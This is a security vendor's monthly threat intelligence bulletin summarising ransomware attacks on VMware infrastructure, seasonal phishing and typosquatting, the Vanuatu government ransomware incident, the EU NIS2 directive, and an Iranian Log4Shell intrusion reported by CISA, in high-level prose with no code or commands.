The Integrity360 CTR team has observed an increased focus by Ransomware as a Service (RaaS) gangs targeting virtualisation infrastructure, particularly VMware ESXI and vCenter. The threat actor playbook is similar across incidents, but no less devastating because of multiple critical servers running on the one hypervisor.
Once initial access is achieved there is often an immediate lurch to identify this virtual infrastructure by using tools such as AdFind and ADRecon, the actor then has three potential methods of logging onto the VMware servers notably vulnerability exploitation, credential harvesting or compromise of a domain admin (if VMware is domain joined).
Once access to the VMware server is gained a new local admin account will be created with full permissions, now the threat actor will begin to reset the current legitimate admins accounts thus locking them out, with full access the objective now involves uploading a ransomware sample to the server, this is generally done using wget.
From Integrity360’s experience once the ransomware is executed it identifies datastores (this is VMware speak for where virtual machines are stored) and will continue to stop all existing virtual machines, delete snapshots(backups) and finally encrypt the datastores essentially destroying the virtual machines.
As we all turn our thoughts to the upcoming holiday period so are cyber criminals. Christmas is always a time when scammers and hackers pick up their activity as they know that most peoples thoughts are more focused on holidays and present buying than security.
We have seen a sharp increase in the amount of phishing emails and SMS messages claiming to be from delivery companies such as DHL and Royal Mail. Fake Christmas sales offers are also in abundance with countless phishing emails being sent daily.
This month also saw the Cost of Living crisis come to the fore and criminals have wasted no time in trying to exploit it. Cost of living scams such as those seeking to take advantage of peoples worries have increased dramatically. These scams might pretend to represent energy companies or direct people to fake loan websites, or contact them regarding the government’s Energy Bills support Scheme to trick them into giving up sensitive information.
We’ve also observed a rise in the number of Typo squatting or URL hijacking attempts on domains. This is the most common method used by fraudsters to scam individual users by directing them to fake sites for delivery companies or for resetting passwords to online subscription services. But for businesses this can relate to attempts to monitor and redirect internal users emails in order to facilitate Business Email Compromise (BEC) scams.
The devastating impacts of ransomware made the headlines this month after the island state of Vanuatu was hit by an attack that disabled the websites of the parliament, police and other government agencies as well as impacting the email systems and intranet of the country’s hospitals, schools and emergency services.
According to reports suspicious phishing activity was detected in emails to the Ministry of Finance. Once the malware was triggered almost all government website and email archives were crashed and with many departments storing their data on local computer drives and not on separate servers or the cloud the impact was magnified. The country continues to struggle with the aftermath of the attack almost a month later.
No official information has been released on whether ransom demands were made by the hackers.
In the wake of recent cyber attacks against the European Parliament and intuitions across the EU Council has adopted legislation for a new high common level of cybersecurity across member countries.
The new NIS2 directive will replace the current NIS directive and is designed to increase resilience and incident response capabilities across the EU.
Read more about the new controls HERE
The US Cybersecurity and Infrastructure Security Agency (CISA) reported that Iranian advanced persistent threat (APT) actors had compromised a US federal network, by exploiting the Log4Shell vulnerability in an unpatched VMWare Horizon server.
Access to the federal network had been used to facilitate the deployment of XMR cryptocurrency mining software, with persistence enabled by moving laterally to domain controllers, compromising credentials, and implanting Ngrok reverse proxies on hosts.
With the World Cup well under way the expected increase in phishing scams and fake domains has not disappointed.
According to new security research over 16,000 scam domains are active and up to 40 malicious apps were discovered in the Google Play store that are designed trick users out of there sensitive information.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitments consultation. Also feel free to explore the many cyber security resources available on our website at https://www.integrity360.com/resources
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.